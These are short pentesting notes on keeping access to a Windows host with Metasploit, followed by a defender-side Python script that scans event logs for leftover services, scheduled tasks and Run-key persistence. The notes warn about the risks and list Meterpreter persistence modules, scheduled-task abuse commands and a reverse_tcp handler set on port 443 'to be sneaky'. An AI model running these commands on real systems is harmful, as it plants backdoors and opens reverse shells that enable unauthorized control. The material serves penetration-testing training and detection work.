Maintaining Access

Persistence is dangerous and usually unnecessary for junior-to-mid-level pentesting (time-limited engagements, not red teaming). It opens a port on a machine with no credentials, which leaves it wide open for a future attack. You'll have to go back in, delete the service and remove it from the registry. The script gives you an RC file that goes in and deletes the files for you, but it's still generally dangerous and unnecessary.

Persistence Scripts

meterpreter > run persistence -h
exploit/windows/local/persistence
exploit/windows/local/registry_persistence

If you want to get a meterpreter shell back:

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
# might set lport to be a known port to be sneaky
msf5 exploit(multi/handler) > set lport 443
msf5 exploit(multi/handler) > set lhost 192.168.202.128

Scheduled Tasks

run scheduleme
run schtaskabuse

Metsvc

run metsvc -A
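To check that the cleanup described at the top of this page actually happened, the defender-side sketch below (an added example, not part of the original notes or of Metasploit) triages Windows events 7045, 4698 and Sysmon 13 for services, scheduled tasks and Run-key values that point into user-writable paths. The sample records, the names in them and the `Command` field are constructed assumptions.

```python
import json

# Event IDs for the three mechanisms on this page (service, scheduled task, Run key).
SERVICE_INSTALLED = 7045   # System log: a service was installed
TASK_CREATED = 4698        # Security log: a scheduled task was created
REGISTRY_VALUE_SET = 13    # Sysmon: registry value set

RUN_KEY = r"\software\microsoft\windows\currentversion\run"  # also matches RunOnce
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\")

# Constructed sample records (one JSON object per line), not from a real host.
# "Command" is an assumed field: the action already extracted from the 4698 task XML.
SAMPLE_EVENTS = r'''
{"EventID": 7045, "ServiceName": "metsvc", "ImagePath": "C:\\Users\\bob\\AppData\\Local\\Temp\\xYzQ\\metsvc.exe service"}
{"EventID": 7045, "ServiceName": "Spooler2", "ImagePath": "C:\\Windows\\System32\\spoolsv.exe"}
{"EventID": 4698, "TaskName": "\\Updater", "Command": "C:\\Users\\Public\\upd.exe"}
{"EventID": 13, "TargetObject": "HKU\\S-1-5-21-1\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\abc", "Details": "C:\\Users\\bob\\AppData\\Local\\Temp\\a.vbs"}
{"EventID": 13, "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Vendor", "Details": "\"C:\\Program Files\\Vendor\\agent.exe\""}
'''

def user_writable(path):
    """True if the path sits under a directory ordinary users can write to."""
    return any(marker in path.lower() for marker in USER_WRITABLE)

def triage(event):
    """Return (mechanism, artifact, path) for likely leftover persistence, else None."""
    eid = event.get("EventID")
    if eid == SERVICE_INSTALLED and user_writable(event.get("ImagePath", "")):
        return ("service", event["ServiceName"], event["ImagePath"])
    if eid == TASK_CREATED and user_writable(event.get("Command", "")):
        return ("scheduled_task", event["TaskName"], event["Command"])
    if eid == REGISTRY_VALUE_SET and RUN_KEY in event.get("TargetObject", "").lower():
        if user_writable(event.get("Details", "")):
            return ("run_key", event["TargetObject"], event["Details"])
    return None

def scan(lines):
    """Parse JSON-lines event records and collect every flagged artifact."""
    findings = []
    for line in lines.splitlines():
        if line.strip():
            hit = triage(json.loads(line))
            if hit:
                findings.append(hit)
    return findings

if __name__ == "__main__":
    for mechanism, artifact, path in scan(SAMPLE_EVENTS):
        print(f"{mechanism:15} {artifact} -> {path}")
```

Each finding names an artifact to remove and confirm gone before the engagement is closed out.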
